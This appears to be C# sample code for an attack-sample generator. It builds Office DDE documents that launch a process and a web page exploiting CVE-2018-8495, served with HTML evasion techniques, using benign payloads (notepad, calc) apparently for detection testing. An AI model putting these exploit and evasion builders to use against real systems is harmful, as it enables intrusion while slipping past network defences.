// Office DDE Example
private static IAttack OfficeDdeExample()
{
var samplesOutput = new SamplesOutput();
var attackName = "OfficeDde";
var attack = new Attack(new IOutput[] {
samplesOutput,
}, name: attackName);
var cmdline = new Tonsil.Processes.CmdLine()
{
image = @"notepad", arguments = new string[] { }
};
var process = new Tonsil.Processes.Process(cmdline);
var processList = new ProcessList(new[] { process });
var wordDde = new WordDDE(processList);
var wordDdeFilename = "WordDDE" + "." + wordDde.Extension;
samplesOutput.Add(wordDdeFilename, wordDde);
var excelDde = new ExcelDDE(processList);
var excelDdeFilename = "ExcelDDE" + "." + excelDde.Extension;
samplesOutput.Add(excelDdeFilename, excelDde);
attack.Generate();
return(attack);
}
private static System.Diagnostics.Process[] GetProcesses(Tonsil.Processes.Process targetProcess)
{
Tonsil.Processes.CmdLine cmdline = targetProcess.CmdLine;
System.IO.FileInfo fi = new System.IO.FileInfo(cmdline.image);
string processName = fi.Name;
string friendlyName = System.IO.Path.GetFileNameWithoutExtension(processName);
System.Diagnostics.Process[] processes = System.Diagnostics.Process.GetProcessesByName(friendlyName);
return(processes);
}
private static IAttack HtmlmthServerOutputExample()
{
// Note: This sample can't use HOSTNAME = HostnameB since port 80 on HostnameB is already occupied by the HTTP Server from Sample4
var HOSTNAME = "HostnameC1"; // the DNS name "HostnameC1" points to the virtual host "VirtualHostC"
var VIRTUALHOST = "VirtualHostC";
var HOST = Host.GetHostByHostName(HOSTNAME) ?? new Host(VIRTUALHOST, HOSTNAME, null);
var htmlmthServerOutput = new HtmlmthServerOutput(HOST); // the default port is 80
var attackName = "HtmlmthServerOutput";
var attack = new Attack(new IOutput[] {
htmlmthServerOutput,
}, name: attackName);
// This represents a commandline used to create a new process
var cmdline = new Tonsil.Processes.CmdLine()
{
image = @"calc", arguments = new string[] { }
};
var process = new Tonsil.Processes.Process(cmdline);
// List of commandlines
var processList = new ProcessList(new[] { process });
// Note: this exploit enforces a ProcessList size of size 1
var exploitWebsite = new CVE_2018_8495(processList);
// Network Evasions to apply to the delivery of the exploit
var exploitEvasions = new[] { // Refer to HTMLMTH documentation & source code for the available evasions
"htmlmth.evasions.html.entity_encoding_attributes_dec",
"htmlmth.evasions.html.external_resource_internal_script",
"htmlmth.evasions.html.insert_slash_after_opening_tag_names",
"htmlmth.evasions.html.bom_declared_utf_16be_encoded_as_utf_16_be"
};
// HtmlmthWebsite represents the HTTP resource(s) hosted by HTMLMTH server
var exploitHtmlmthWebsite = new HtmlmthWebsite(exploitWebsite, HOST, exploitEvasions);
// Dont forget to bookkeep
htmlmthServerOutput.Add(exploitHtmlmthWebsite);
attack.Generate();
// The files needed to launch the HTMLMTH server should now be at $(ProjectDir)\bin\$(Configuration)\$(TargetFramework)\Output\Server\HostnameB\80_HTMLMTH_Server
return(attack);
}
